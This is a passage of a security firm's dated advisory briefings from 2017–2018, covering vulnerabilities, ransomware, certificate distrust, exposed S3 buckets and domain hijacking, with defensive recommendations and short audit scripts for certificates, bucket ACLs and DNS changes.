Recommendations
First and foremost, it is important to deploy ICS devices on an isolated network segment to ensure that they are not accessible from the Internet.  InGuardians recommends that you deploy ICS networks and devices behind firewalls and other network controls, isolating them from the business network.  InGuardians also recommends performing routine risk assessments to ensure that controls and audit measures are working properly.

As for these specific vulnerabilities, Moxa released patches last week (link in the Additional Resources below).

Additional Resources
DHS advisory:
https://ics-cert.us-cert.gov/advisories/ICSA-18-095-02

NCCIC document on recommended practices for securing ICS
https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf

* Moxa MXview advisory:
https://www.moxa.com/support/faq/faq_detail.aspx?id=2717

* Moxa MXview site: 
https://www.moxa.com/support/sarch_result.aspx?type=faq&prod_id=622&type_id=7

* Moxa AWK-3131A
https://www.moxa.com/product/AWK-3131A.htm

*N.B. the Moxa site is badly designed, with no clear and easy way to view security updates and advisories.

04/02/2018 Drupal CMS High-Critical Remote Code Execution Vulnerability

Issue
Security researchers have discovered and publicly released several Highly Critical Remote Code Execution (RCE) vulnerabilities in Drupal versions 7 through 8.5, as well as the end-of-life version 6.  Due to the serious nature of these remote code execution vulnerabilities, Drupal has released patches for older, unsupported versions including version 6.

The Drupal Content Management System (CMS) powers 6% of the 10,000 most popular public web sites. Over 647,000 publicly-accessible web sites use this software. This may increase the risk that bad actors may either quickly attack companies running Drupal or will create and release malware targeting this software.

Remote code execution vulnerabilities like these allow an attacker to execute code of their own choosing on an unpatched installation. This could ultimately result in full system compromise and/or allow the attacker to move laterally to compromise other machines, including those on internal network segments.

InGuardians often finds that organizations do not have an accurate inventory of Internet-facing hosts or the applications which they host.  In these cases, application vulnerabilities are particularly challenging to defend, as it is impossible to update software that isn’t known to the patch management staff.

Impact
Unless Drupal CMS versions are updated to 7.58 or 8.51,  it is possible for an attacker to gain full control of the affected system. Drupal CMS version 6 permits the same behavior unless patched against SA-CORE-2018-2. Depending on the attacker’s skillset, as well as the defender’s level of network segmentation, it is possible that an attacker could take full control of the defender’s infrastructure.

Recommendations
InGuardians recommends immediate patching of the Drupal content management system (CMS) across all versions.  Until such time as a patch can be applied, InGuardians recommends that affected organizations restrict access severely to a few trusted IP addresses.  This restriction should only be utilized to perform appropriate upgrades and patches, before restoring full access.

This is also the perfect opportunity to undergo an aggressive look at internet-facing resources in order to develop an accurate inventory, with the intent of finding previously unknown assets including Drupal.  Upon completion of internet-facing asset discovery, InGuardians recommends performing a similar discovery on internal network segments.

Additional Resources 
Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002
https://www.drupal.org/sa-core-2018-002
FAQ about [Security Advisory] SA-CORE-2018-002
https://groups.drupal.org/security/faq-2018-002
[Content Management System] CMS Usage Statistics
https://trends.builtwith.com/cms

03/28/2018 Municipal governments battle cyber attacks.

Issue
The Georgia cities of Atlanta and Loganville are the latest victims in an ongoing trend of attacks on municipalities. First, on Thursday, March 22nd, the City of Atlanta announced that its networks had been shut down due to a ransomware attack. At the time of this posting, the city is working with the FBI and the Department of Homeland Security, as well as external partners from Microsoft and Cisco’s cybersecurity response team, to investigate the situation.

The City of Loganville (a suburb of Atlanta), announced on Monday, March 26th on its Facebook page that an external threat actor had successfully perpetrated a breach of an internal server. The Loganville breach may not be related to that of Atlanta.

Impact
In Atlanta, the ransomware has cut off electronic access to court records, while many departments are using pen and paper to perform their duties. Many city services, such as electronic bill pay, are still unavailable to city residents. As a precautionary measure, the public wireless network (Wi-Fi) at Hartsfield-Jackson airport has also been suspended.

Evidence suggests the Atlanta malware is SamSam, which has been seen in other government targeted attacks, like the one that occurred at Colorado’s state Department of Transportation.  In particular, the letter shared by local media during the early stages of the ransomware infection in Atlanta is clearly a SamSam ransom note. The wording — including typos — is identical to the examples shared by researchers working for Cisco’s Talos group earlier this year. The only difference was the directory where the contact portal is hosted.

Once attribution to SamSam became public knowledge, the SamSam group deleted the contact portal that the city of Atlanta would use to make payment. Given the SamSam group’s actions, it isn’t clear if payment is even possible now. While it is possible other portals exist for the systems infected in Atlanta, the city hasn’t released any technical details to the public.

In Loganville, the breach is believed to have exposed personally identifiable information (PII), such as social security numbers, to the attacker.

Recommendations
InGuardians echoes the sentiments of the newly elected Atlanta Mayor who is quoted as saying, “this is bigger than a ransomware attack, it’s an attack on government and therefore an attack on all of us.”

It is increasingly apparent that organizations must make the resources available and establish effective policies and preventative measures to strengthen their security postures in order to mitigate these threats.

InGuardians recommends that all leaders of municipal governments view themselves as a likely soft target and create internal Information Security programs to address the emerging threats. We also recommend that all business leaders continue to follow this case for lessons learned, such as:

  • Do not leave Remote Desktop Protocol (RDP), Windows Server Message Block (SMB), Secure Shell (SSH) or Telnet available to the Internet – use VPNs and firewall white lists
  • Confirm that no operations systems use SMB version 1
  • Apply Windows group policy objects (GPOs) to harden government systems uniformly
  • Do not allow users to have local administrative privilege on their desktop machines
  • Make sure that all patches are deployed quickly – malware victims have lost a race with an attacker

Additional Resources

Small Towns Confront Big Cyber Risks (GovTech)
http://www.govtech.com/security/GT-OctoberNovember-2017-Small-Towns-Confront-Big-Cyber-Risks.html

Atlanta Working “Around the Clock” to Fight Off Ransomware Attack (NPR)
https://www.npr.org/sections/thetwo-way/2018/03/27/597208778/atlanta-working-around-the-clock-to-fight-off-ransomware-attack

We Are a Resilient City – Atlanta Works to Move Forward Following Cyber Attack (11Alive)
http://www.11alive.com/article/news/we-are-a-resilient-city-atlanta-works-to-move-forward-following-cyber-attack/85-532179763

Metro Atlanta City Reports Its Own Data Breach (Atlanta Journal Constitution)
https://www.ajc.com/news/local-govt–politics/metro-atlanta-city-reports-its-own-data-breach-warns-customers/GsK565pH9L8y3GOk0NvERI/

Atlanta’s Computers Crippled by Ransomware – Issues Unresolved After 4 Days (SmartCities Dive)
https://www.ciodive.com/news/fbi-ransomware-attack-atlanta/519865/

03/19/2018 New DHS alert on breaches of power grid and other control systems

Issue

Disabling safety or security controls invalidates risk assessment and mitigation.  It won’t matter if the control was disabled by a hacker or by an employee.

New information is surfacing about the breach of control systems first identified in August 2017.  One conceptual flaw and one implementation or operating error combined to defeat safety systems and shut down systems.

In a SCADA environment, the TRICONEX system is a sound concept, using triple redundancy comparison of signals as a check of proper operating conditions. If one of the 3 is different, the system enters a safety condition with appropriate alerts and changes. That could mean opening valves to increase cooling, or shutting fuel valves to stop machinery. The firmware of the controllers can, of course, be updated.

To ensure security, a physical switch is used to change it from “read only” to “read-write” for updates. A variety of implementation factors, from remote locations to limited personnel managing large automated systems, may have contributed to operators leaving systems in read-write. In at least one case, one of the maintenance management computers was compromised allowing hackers access to now fully modifiable controllers. In another case, the SCADA system was on a larger network and not properly isolated from external connections leaving it vulnerable to external penetration.

Remote network access to systems enabled hackers to destroy hard drives inside the company’s computers and their data was wiped clean. (NYT). It also appears that only an error in the attack code prevented physical damage and possibly explosions.

Impact

InGuardians’ clients may be at LOW risk for the specific attacks used against these Industrial Control Systems (ICS).

However, the broader issue of increased risk from “work arounds” which inevitably occur in every business may be negating what you think is in place for risk mitigation. The focus is NOT on malicious employees, but on those trying to succeed in the face of unintended policy conflicts. Too few people required to do detailed checks on too many systems too widely separated or remotely located is only one of the sorts of situations that creep into daily ops.

Recommendations

Review ACTUAL operating conditions and procedures compared to policy. Third party audits or interdepartmental audit teams provide fresh perspectives.

Think more like an attacker. Be less sure – “my door is locked, I can relax” – and more – “the door has a lock but how would it get picked? Broken? Simply evaded?  If it was picked, how would I know”.  Red Teams don’t simply do set penetration tests, but use creative thinking to find the unexpected gaps, the new approaches. Those attacking your systems don’t have any rules.

Additional Resources

US CERT:

https://www.us-cert.gov/ncas/alerts/TA18-074A

NY TIMES:

https://www.nytimes.com/2018/03/15/technology/saudi-arabia-hacks-cyberattacks.html

WIRED:
https://www.wired.com/story/triton-malware-dangers-industrial-system-sabotage/

03/12/2018 Dofoil trojan variant used to install cryptocurrency-mining malware

Issue
Microsoft’s Windows Defender Research group identified a new variant of the Win32/Dofoil remote access trojan which installed a cryptocurrency miner for Electroneum (ETN) coin.

Impact

The impact of this trend is severe, due in part to the trojan’s ability to download and execute code on command.  The Dofoil family of trojans gives the attackers full command and control of the compromised system. In addition to crypto mining, the trojan has previously been used to install ransomware and other malicious code.

In this latest attack, Dofoil used a technique known as process hollowing, copying legitimate binaries for explorer.exe and swapping malware in its place.

Many attackers are using cryptocurrency mining as a major revenue stream.  During the WannaCry outbreak, at least two other groups used the same exploits to install crypto miners and subsequently earn millions of dollars (far better than the WannaCry authors fared.)

Recommendations

InGuardians recommends having a robust segmented network, with good instrumentation of inbound and outbound traffic.  Organizations can use network and host monitoring tools that identify unusual behavior and activity to help identify and contain malware outbreaks.  Some of the tools that can be used for detection and containment are Bro, Snort, and Windows Defender. Many anti-malware and threat protection services claim to detect and protect against cryptocurrency miners.

Detection of cryptocurrency miners is typically done by identifying the installation, code injection, or persistence mechanisms, as well as the coin mining itself.  While the miners that we are discussing here are hidden in running processes, there are many implementations of JavaScript miners that run in browsers.

In addition to segmentation and instrumentation, InGuardians recommends having solid backup and recovery solutions in place.  These should be tested on a regular basis, with verification of the recovered systems.

Additional Resources

Win32/Dofoil (Microsoft Windows Defender Security Intelligence)

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32%2FDofoil

DoFoil: Crypto-mining Malware Outbreak Infects 500,000 Computers In One Day (Newsweek)

http://www.newsweek.com/crypto-mining-malware-outbreak-infected-500000-computers-single-day-836145

The State of Malicious Crypto-mining (MalwareBytesBlog)

https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/

03/05/2018 Widespread SSL Certificate Revocation Disrupting Internet Transport Encryption with Further Disruption Planned for April and October

On Wednesday, Trustico (a Symantec reseller) triggered the revocation of roughly 23,000 SSL/TLS certificates, in advance of April and October’s certificate disruptions on any certificate sold under the brands Symantec, GeoTrust, Thawte, and RapidSSL.

While the April deadline for Symantec, GeoTrust, Thawte and RapidSSL certificates looms, Trustico’s method of revocation has caused further concern. Trustico wanted to move its customers from roughly 50,000 Symantec-provided certificates to new ones provided by Comodo. Digicert, who had purchased Symantec’s certificate business, initially refused, on the basis that it would only revoke so many certificates in the case of a security breach. Trustico’s CEO then e-mailed 23,000 certificates’ private keys without encryption to Digicert, thus creating a breach. The breach was compounded when a remote code execution vulnerability was found in Trustico’s website.

This situation calls into question Trustico’s practices as a certificate reseller. First, certificate vendors should not retain private keys. Second, Trustico’s choice to e-mail private keys put all communications using those keys at risk and may have failed to give customers the opportunity to replace the certificates before this risk window.

Impact
Any organization using one of the revoked Trustico-resold Symantec SSL certificates has lost the integrity of HTTPS connections to any server using that certificate. Users will generally see an untrusted connection error immediately and many will understand that a problem exists. Further, any organization using a Symantec certificate, including those branded as GeoTrust, Thawte and RapidSSL, will face a similar problem on April 17th or in October, at which point Google’s Chrome and Mozilla’s Firefox browsers will begin stating that the certificates are untrusted. See the schedule below (under “Recommendations”) for more detail.

Recommendations
InGuardians strongly recommends that organizations audit their SSL/TLS certificates, determining which have been provided by Symantec, GeoTrust, Thawte and RapidSSL. Staff should replace every certificate provided by these companies well before the following deadlines:

April 17th: Certificates issued before June 1, 2016 will not work with Chrome 66.

May: Certificates issued before June 1, 2016 will not work with Firefox 60.

October: Certificates will no longer be trusted, as of Firefox 63.

October 23rd: Certificates will no longer be trusted, as of Chrome 70.

Organizations can use a number of tools to check their SSL/TLS certificates, whether for their web servers or their other SSL/TLS-enabled services. The popular open source tool, nmap, will display information about the certificate enabled on one or more ports, like so:

nmap -v -sT -p 443 --script=ssl-cert www.inguardians.com | egrep '(Issuer|valid)'
| Issuer: commonName=GeoTrust RSA CA 2018/organizationName=DigiCert Inc/countryName=US/organizationalUnitName=www.digicert.com
| Not valid before: 2018-01-25T00:00:00
| Not valid after:  2019-02-24T12:00:00
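To turn that nmap output into an inventory decision, here is an added Python example (not InGuardians' tooling) that parses the Issuer and validity lines the ssl-cert script prints, flags certificates whose issuer carries one of the four brand names, and sorts them into the two deadline groups from the schedule above using the June 1, 2016 cutoff. The three scan outputs and host names are constructed samples, and AUDIT_DATE is an assumed "today" for the expiry check.

```python
"""Triage `nmap --script=ssl-cert` output against the distrust schedule."""
from datetime import datetime

# Brands the briefing names as subject to the distrust schedule.
AFFECTED_BRANDS = ("symantec", "geotrust", "thawte", "rapidssl")
# Certificates issued before this date are distrusted first
# (Chrome 66 on April 17, Firefox 60 in May); all others in October.
EARLY_CUTOFF = datetime(2016, 6, 1)
NMAP_TIME = "%Y-%m-%dT%H:%M:%S"
# Assumed audit date (the briefing's date); pass your own to audit().
AUDIT_DATE = datetime(2018, 3, 5)


def parse_ssl_cert_output(text):
    """Pull issuer and validity window out of the '| ' lines printed by
    nmap's ssl-cert script (the same lines the egrep above keeps)."""
    cert = {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("|").strip()
        if line.startswith("Issuer:"):
            cert["issuer"] = line.split(":", 1)[1].strip()
        elif line.startswith("Not valid before:"):
            cert["not_before"] = datetime.strptime(line.split(":", 1)[1].strip(), NMAP_TIME)
        elif line.startswith("Not valid after:"):
            cert["not_after"] = datetime.strptime(line.split(":", 1)[1].strip(), NMAP_TIME)
    return cert


def classify(cert, today):
    """Return a short triage verdict for one parsed certificate."""
    if cert.get("not_after") and cert["not_after"] < today:
        return "expired"
    issuer = cert.get("issuer", "").lower()
    brands = [b for b in AFFECTED_BRANDS if b in issuer]
    if not brands:
        return "not in scope"
    label = "/".join(brands)
    if cert["not_before"] < EARLY_CUTOFF:
        return f"{label}: replace before April 17 (Chrome 66) and May (Firefox 60)"
    return f"{label}: replace before October (Firefox 63, Chrome 70)"


def audit(scans, today):
    """Map each host to its verdict; scans is {host: nmap output text}."""
    return {host: classify(parse_ssl_cert_output(out), today) for host, out in scans.items()}


# Constructed sample outputs, one per host, in the ssl-cert script's format.
CONSTRUCTED_SCANS = {
    "legacy.example.com": """
| Issuer: commonName=Symantec Class 3 Secure Server CA - G4/organizationName=Symantec Corporation/countryName=US
| Not valid before: 2015-11-02T00:00:00
| Not valid after:  2018-11-02T23:59:59
""",
    "shop.example.com": """
| Issuer: commonName=RapidSSL SHA256 CA/organizationName=GeoTrust Inc./countryName=US
| Not valid before: 2017-06-10T00:00:00
| Not valid after:  2019-06-10T23:59:59
""",
    "blog.example.com": """
| Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
| Not valid before: 2018-02-01T09:12:00
| Not valid after:  2018-05-02T09:12:00
""",
}

if __name__ == "__main__":
    for host, verdict in audit(CONSTRUCTED_SCANS, AUDIT_DATE).items():
        print(f"{host}: {verdict}")
```

A brand-name match is only a triage hint: the nmap output above shows a GeoTrust-branded CA whose organizationName is DigiCert Inc, so confirm which CA actually issued a flagged certificate before scheduling its replacement.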

Organizations should be careful to check all ports on a system, and not just the standard service ports for SSL/TLS.

Additional Resources
Google: “Chrome’s Plan to Distrust Symantec Certificates”
https://security.googleblog.com/2017/09/chromes-plan-to-distrust-symantec.html

Mozilla: “CA:Symantec Issues”
https://wiki.mozilla.org/CA:Symantec_Issues

DigiCert: “How do you handle mass revocation requests?”
https://groups.google.com/forum/#!msg/mozilla.dev.security.policy/wxX4Yv0E3Mk/QZt8UPhKAwAJ

Trustico® Abandons Symantec® SSL Certificates
https://www.trustico.com/news/2018/abandons/trustico-abandons-symantec.php

02/26/2018 Increased attacker focus on exposed cloud services, specifically AWS Simple Storage Service (S3) Buckets

Issue

Amazon’s cloud-based Simple Storage Service Buckets, colloquially referred to as “S3 Buckets”, have been a recent focus of attackers and security researchers.  With the advent of new open source and publicly-available tools to search for improperly configured S3 buckets, bad actors and information security firms have found many cases where the buckets’ owners have inadvertently granted access to every user on the Internet.
Internet-accessible S3 buckets have multiple risks. In cases of world-wide read-only access, the discoverers have found personally-identifiable information (PII) and other sensitive data. In at least one case of world-wide write access, the discoverer found a production website hosting content directly from the bucket, such that any Internet user could alter the website’s content.  A bad actor could drastically change the overall presentation of the site and would likely add hostile JavaScript code that would run in every visitor’s browser, including key-loggers or crypto-coin mining clients. When discovered, this could ultimately reduce customer faith in the company owning the S3-backed site.
In moving to cloud-hosted services, many organizations have failed to heed widespread warnings with this message:
Organizations must secure and monitor cloud-based services just as strongly as with traditional on-premise infrastructure.

Impact

Impact from exposure of Amazon S3 is varied, depending on an organization’s adoption and configuration of Amazon’s cloud-based storage infrastructure:

Known adoption of Amazon S3: The risk level varies from low to critical, depending on individual bucket configuration for read/write access, granularity of defined accesses, types of content stored, and use cases for the stored content. The overall level of risk would be determined by these factors and will be different for each individual bucket within an organization’s cloud infrastructure.

No known adoption of Amazon S3: The current risk is undefined, and merits analysis to identify whether your organization is using S3; if it is, see above.

Recommendations


InGuardians recommends performing a self-assessment of existing S3 Buckets using currently available tools, such as AWSBucketDump and BuckHacker.  Results of these tools should then undergo a thorough inventory and risk analysis.

In addition to these open source tools, Amazon makes the AWS Trusted Advisor tool available to customers with a Business or Enterprise-level support plan. Trusted Advisor can analyze an AWS environment, including its S3 buckets, and make best practice recommendations.
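As an added example of the self-assessment recommended above (example code, not InGuardians' or Amazon's), the following Python function inspects S3 bucket ACLs in the dict shape that boto3's s3.get_bucket_acl(Bucket=name) returns and flags grants to the two predefined AWS groups that make a bucket world-accessible. It ranks write access above read access, matching the defacement-versus-disclosure distinction in the Issue section. The bucket names and ACLs below are constructed samples; ACLs are only one of S3's access-control mechanisms, so a bucket policy review is still needed.

```python
"""Flag S3 bucket ACL grants that expose a bucket to the public."""

# Predefined AWS groups whose presence in a grant makes it public.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the Internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}
# World-writable buckets (site defacement) outrank world-readable ones
# (data exposure), per the briefing's Issue section.
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def public_grants(acl):
    """Return one finding per grant that targets a public group."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") != "Group" or uri not in PUBLIC_GROUPS:
            continue
        permission = grant["Permission"]
        severity = "critical" if permission in WRITE_PERMISSIONS else "high"
        findings.append({"who": PUBLIC_GROUPS[uri], "permission": permission, "severity": severity})
    return findings


def audit_buckets(acls_by_bucket):
    """Map bucket name to findings, keeping only buckets with a public grant."""
    results = {}
    for name, acl in acls_by_bucket.items():
        findings = public_grants(acl)
        if findings:
            results[name] = findings
    return results


# Constructed sample ACLs (same shape as get_bucket_acl output).
OWNER = {"DisplayName": "example-owner", "ID": "constructed-canonical-id"}
CONSTRUCTED_ACLS = {
    "public-site": {"Owner": OWNER, "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": OWNER["ID"]}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "WRITE"},
    ]},
    "shared-archive": {"Owner": OWNER, "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": OWNER["ID"]}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}, "Permission": "READ"},
    ]},
    "private-backups": {"Owner": OWNER, "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": OWNER["ID"]}, "Permission": "FULL_CONTROL"},
    ]},
}

if __name__ == "__main__":
    for bucket, findings in audit_buckets(CONSTRUCTED_ACLS).items():
        for f in findings:
            print(f"{bucket}: {f['severity']} - {f['permission']} granted to {f['who']}")
```

In a live run, replace CONSTRUCTED_ACLS with a dict built by iterating list_buckets() and calling get_bucket_acl() for each bucket; the audit logic itself does not change.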

Additional Resources

Tesla Cryptojacked by Currency Miners

https://nakedsecurity.sophos.com/2018/02/22/tesla-cryptojacked-by-currency-miners/

AWSBucketDump, an Open Source S3 Bucket Search Tool

https://github.com/jordanpotti/AWSBucketDump

BuckHacker, an S3 Search Engine
https://www.thebuckhacker.com/

AWS S3 Documentation: Which Access Control Method Should I Use?
https://docs.aws.amazon.com/AmazonS3/latest/dev/access-control-overview.html#so-which-one-should-i-use

AWS Trusted Advisor

https://aws.amazon.com/premiumsupport/trustedadvisor/

02/20/2018 Theft of Newtek domains is a reminder to stay vigilant

Issue

Last week a web services company (Newtek) responsible for hosting over 100,000 e-commerce based websites and email servers had three of its core domains stolen.  These domains originally hosted software that allowed customers of these services to manage their websites.

The attackers then replaced the application that users would normally use to manage their websites with their own application in the form of a live-chat service.  When users logged in, they believed themselves to be chatting with a helpful admin, when in fact they were communicating with the attacker.

Impact

The full impact of this is still being determined.  However, corporate email for many of their customers became unavailable, business websites no longer resolved, and sensitive information was most likely communicated to the attacker.

Recommendations

InGuardians recommends that all businesses consider domain hijacking as a potential event in their Business Continuity Plans (BCP).  It’s important to stay vigilant in ensuring continued ownership of domains. It’s also important to have plans to use secondary domains for web and email traffic in the event of having lost ownership of a domain.

InGuardians recommends building your own capabilities to gather counter-intelligence and to proactively monitor your organization’s digital footprint.  Consider scripts or services for monitoring DNS changes to the domains that you control.
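One shape such a DNS-change monitor can take, as an added Python example (not InGuardians' code): parse the answer section that dig prints for a domain into a snapshot, compare it with a stored baseline, and raise an alert per changed record type, with a change to the NS delegation ranked highest because that is what a registrar-level transfer looks like. The domain, name servers, addresses and the two dig outputs below are constructed samples.

```python
"""Detect changes to a domain's delegation and key records between a
stored baseline and a fresh `dig +noall +answer <domain> <type>` run."""

MONITORED = ("NS", "A", "MX")
# An NS change is the classic sign of a domain transfer, so it outranks
# A/MX changes, which may be routine operations work.
SEVERITY = {"NS": "critical", "MX": "high", "A": "medium"}
_ORDER = {"critical": 0, "high": 1, "medium": 2}


def parse_dig_answer(text):
    """Parse dig answer lines ("name ttl class type rdata") into
    {rtype: set(rdata)}; lines that are not IN-class answers are skipped."""
    records = {}
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) < 5 or parts[2] != "IN":
            continue
        rtype, rdata = parts[3], " ".join(parts[4:])
        records.setdefault(rtype, set()).add(rdata)
    return records


def diff_snapshots(domain, baseline, current):
    """Return one alert per monitored record type that changed,
    highest severity first."""
    alerts = []
    for rtype in MONITORED:
        before = baseline.get(rtype, set())
        after = current.get(rtype, set())
        if before != after:
            alerts.append({
                "domain": domain,
                "type": rtype,
                "severity": SEVERITY[rtype],
                "added": sorted(after - before),
                "removed": sorted(before - after),
            })
    alerts.sort(key=lambda a: _ORDER[a["severity"]])
    return alerts


# Constructed baseline captured when the domain was known to be healthy.
BASELINE_DIG = """
example.com.  3600  IN  NS  ns1.example-dns.net.
example.com.  3600  IN  NS  ns2.example-dns.net.
example.com.  300   IN  A   203.0.113.10
example.com.  3600  IN  MX  10 mail.example.com.
"""

# Constructed later snapshot: delegation and web address both changed.
CURRENT_DIG = """
example.com.  3600  IN  NS  ns1.other-dns.example.
example.com.  3600  IN  NS  ns2.other-dns.example.
example.com.  300   IN  A   198.51.100.7
example.com.  3600  IN  MX  10 mail.example.com.
"""

if __name__ == "__main__":
    for alert in diff_snapshots("example.com", parse_dig_answer(BASELINE_DIG), parse_dig_answer(CURRENT_DIG)):
        print(f"[{alert['severity']}] {alert['domain']} {alert['type']}: "
              f"removed {alert['removed']} added {alert['added']}")
```

Scheduled hourly from a host outside the monitored domain's own infrastructure, with the baseline stored read-only, this gives early warning of exactly the kind of takeover described above; query at least two independent resolvers so that a single poisoned cache does not masquerade as a transfer.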

 

Wikipedia lists these options as a means to prevent an unwanted domain transfer:

  • Use strong email passwords and enable two-factor authentication if available.
  • Disable POP if your email provider is able to use a different protocol.
  • Tick the setting “always use https” under email options.
  • Make sure to renew your domain registration in a timely manner – with timely payments and register them for at least five (5) years.
  • Use a domain-name registrar that offers enhanced transfer protection, i.e., “domain locking” and even consider paying for registry locking.



Additional Resources

https://krebsonsecurity.com/2018/02/domain-theft-strands-thousands-of-web-sites/
https://en.m.wikipedia.org/wiki/Domain_hijacking

02/12/2018 Smart devices add exposure and threat during a breach and are a source of intelligence and forensic data during incident response.

Issue
A common challenge in any incident response is figuring out how access was gained, which vulnerability or exploits were used, and how to prevent recurrence. Many breaches are not single events, but the end of a longer series of probes, penetrations, and exfiltrations. The reality is that we are often dealing not with “a breach,” but a series of incidents that can have been going on longer than many realize.

The explosion of smart devices creates many more opportunities not only to reveal information, but for attack vectors. A “phishing” email might be read on an employee’s cell phone and not directly breach a corporate system. But, it might install malware on that phone so the next time it is in WiFi or Bluetooth proximity of a business network the malware starts searching for new opportunities. This shifts what would have been an external penetration to an internal one.

Impact
The specific impact to InGuardians customers is relatively low.

The real challenge is in mapping the many additional connections to your networks, and identifying where such connections are logged – if at all. You cannot effectively investigate the cause or source of a breach if you do not have a clear record of the network.

Recommendations
InGuardians recommends regular review of network architecture as it develops, not merely as planned. Systems and connections often grow organically and in creeping increments, and too often expedient solutions are imperfectly documented. It is important to know what the network looks like today, to know where device access logs are stored, and whether they have ever been reviewed.  InGuardians highly recommends robust egress filtering and monitoring.

InGuardians also recommends reviewing the policy for the devices managed by your organization.  Secretary of Defense Mattis is reconsidering DoD’s policies for every personal electronic device that “transmits a two-way signal”.  That’s much more than just cell phones, but you should at least know WHAT you allow.

Additional Resources

http://www.nextgov.com/policy/2018/01/pentagon-reviewing-electronic-device-policy/145625/

02/05/2018 Strava heatmap exposes sensitive military bases, invoking the law of unintended consequences.

Issue
Something as innocuous as a running application paired with cloud access and GPS location data allowed users to identify sensitive military and government bases and users.  The Guardian newspaper used a script to generate GPS data to upload to a Strava account.  Following this, they used the application to find other users that also do the same run.  The runs matched sensitive locations such as military installations and classified government facilities.  They identified 50 users by name.

With so many interconnecting devices, where is the boundary of your data?  If you don’t know where your data is, and where it goes, you cannot secure it.  With multiple devices providing cloud or syncing functionality, the ease with which data can unintentionally leak out of the environment is astounding.

Impact
Impact from the Strava heatmap to InGuardians customers is relatively low.  The issue does present us with the conundrum of securing our data, performing operational security, and still being able to use that data and the many applications that have become intrinsic to our businesses.   

Recommendations
InGuardians’ primary recommendation is to analyze the potential exfiltration threats that applications pose, and create policy to deal with these accordingly.  Some examples of applications and policies in this arena would be: social media use policy, onsite photography or mobile phone use, or modifying the metadata.

InGuardians also recommends implementing a Mobile Device Management (MDM) solution to enforce policy onto the devices managed by your organization.  Implementing steps in order to lock down functionality on these devices based on your internal processes and policies is critical.  Unknown, unmanaged devices should not be allowed on your network.  The larger concern goes beyond “Strava” and may include data that is gathered but not publicly mapped.

Additional Resources

Strava Heatmap and related articles

https://labs.strava.com/heatmap/#6.00/34.08716/29.07362/hot/all

https://www.washingtonpost.com/news/the-switch/wp/2018/01/31/lawmakers-demand-answers-about-strava-heat-map-revealing-military-sites/?utm_term=.7e78368ca5af

https://www.engadget.com/2018/02/02/strava-s-fitness-heatmaps-are-a-potential-catastrophe/

Metadata

https://support.office.com/en-us/article/Remove-hidden-data-and-personal-information-by-inspecting-documents-356b7b5d-77af-44fe-a07f-9aa4d085966f#ID0EAACAAA=PowerPoint

07/25/2017 Mac malware (FruitFly) that was detected and patched in January is still making the rounds, according to a Black Hat presenter.

Issue
In January, malware that infects Mac OS X was detected impacting organizations performing research in the biomedical field.  This malware leveraged old functions that have been around in OS X for many years.  The main goal of the malware appears to be surveillance: it captures screenshots, accesses the webcam, and reportedly performs keylogging.

Apple released a patch for this issue in January when the malware was first detected.  Many news outlets are incorrectly reporting that there is no known way to detect this malware; in fact, nearly all major AV vendors have signatures for FruitFly.

Impact
According to the Black Hat presenter, the recent infections appear to be mostly home users.  This is likely because all properly licensed versions of OS X have been patched by Apple through a behind-the-scenes update mechanism since January.

The impact of this particular issue is low at the moment.

Recommendations

Even with a low impact, the detection of this malware is a reminder to practice good operational security (opsec) and keep built-in webcams covered when not in use.  It is also a reminder that Apple systems can be compromised by malware.

InGuardians recommends that organizations ensure all operating systems are licensed and up to date with all relevant security patches.  InGuardians also recommends that organizations deploy endpoint security products that properly monitor all operating systems, including Apple products.

Additional Resources

07/17/2017 Kaspersky anti-virus removed from two GSA Schedules

Kaspersky Anti-Virus (AV) has been removed from two GSA (General Services Administration) schedules, due to concerns that the Kremlin could use Kaspersky products to compromise U.S. Government computers.

A commonly used anti-virus product has been banned for purchase by any U.S. Government agency that buys through GSA schedules 67 and 70.  While the U.S. government has not yet banned Kaspersky products already purchased, or those purchased outside the GSA schedule, the Senate version of the 2018 defense bill places a blanket ban on Kaspersky products.  That bill has not yet passed.   Many government and private organizations receiving U.S. federal or state funding are required to make such purchases via the GSA schedule.

Impact

This ban limits further acquisition of Kaspersky AV by organizations required to purchase through GSA.  However, many organizations already have this product entrenched in their infrastructure, and organizations not bound by the GSA schedule may decide to follow the GSA’s lead.  Organizations may have many questions on how to move forward.

Recommendations

Tactical
Hold tight.  There is a significant amount of posturing and saber rattling on the geopolitical stage at the moment.  A number of independent research organizations are currently examining Kaspersky’s software, and reports should be forthcoming.
Strategic
InGuardians recommends that organizations not rely solely on one vendor’s security products.  Organizations should evaluate multiple providers and select only those with which they can form a trusted relationship.  In the event that a trusted relationship is compromised, the organization should have contingency plans that enable the removal of that vendor and the selection of a new one without losing coverage.  Most of our clients favor endpoint protection, in addition to layered application and network defenses, over traditional anti-virus.

Additional Resources

http://thehill.com/policy/cybersecurity/341665-trump-admin-removes-russian-cyber-firm-from-approved-list

https://arstechnica.com/security/2017/07/kaspersky-denies-inappropriate-ties-with-russian-govt-after-bloomberg-story/

07/10/2017 DHS & FBI warn of attacks against US energy & manufacturing companies and employees

Issue
